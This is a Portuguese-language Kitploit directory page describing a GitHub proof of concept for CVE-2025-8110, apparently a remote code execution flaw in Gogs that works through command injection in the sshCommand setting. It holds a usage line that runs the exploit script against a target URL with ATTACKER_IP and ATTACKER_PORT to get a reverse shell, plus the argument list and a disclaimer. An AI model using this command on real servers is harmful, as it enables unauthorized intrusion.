Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
gogs-CVE-2025-8110 — PoC do CVE-2025-8110 | Kitploit
Ferramentas/GitHubGitHub/zabuqasem/gogs-cve-2025-8110
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubzabuqasem/gogs-cve-2025-8110

gogs-CVE-2025-8110

PoC do CVE-2025-8110

Ver Repositório
29há 7 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gogs CVE-2025-8110 PoC

Este repositório contém uma Prova de Conceito (PoC) para o CVE-2025-8110, uma vulnerabilidade de Execução Remota de Código (RCE) no Gogs. O exploit tem como alvo a implementação do servidor SSH interno, permitindo que atacantes injetem comandos maliciosos por meio da configuração sshCommand.

Uso

Para executar o exploit, utilize o script CVE-2025-8110.py com a URL do Gogs de destino e o seu host/porta de escuta para o shell reverso.

root@kitploit:~
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>

Argumentos

  • -u, --url: URL base da instância do Gogs alvo (ex.: http://localhost:3000).
  • -lh, --host: Endereço IP para o qual o shell reverso deve se conectar.
  • -lp, --port: Porta para a qual o shell reverso deve se conectar.
  • -x, --proxy: (Opcional) Use um proxy local em http://localhost:8080 para depuração.

Aviso Legal

Esta Prova de Conceito (PoC) tem finalidade exclusivamente educacional e de pesquisa. Destina-se a ajudar pesquisadores de segurança e administradores a compreender e mitigar a vulnerabilidade CVE-2025-8110.

O autor não se responsabiliza por qualquer uso não autorizado ou malicioso deste código. Utilize esta ferramenta apenas em sistemas seus ou para os quais você tenha permissão explícita para testar. Ao usar este código, você concorda em assumir total responsabilidade por suas ações.

Baixar ferramenta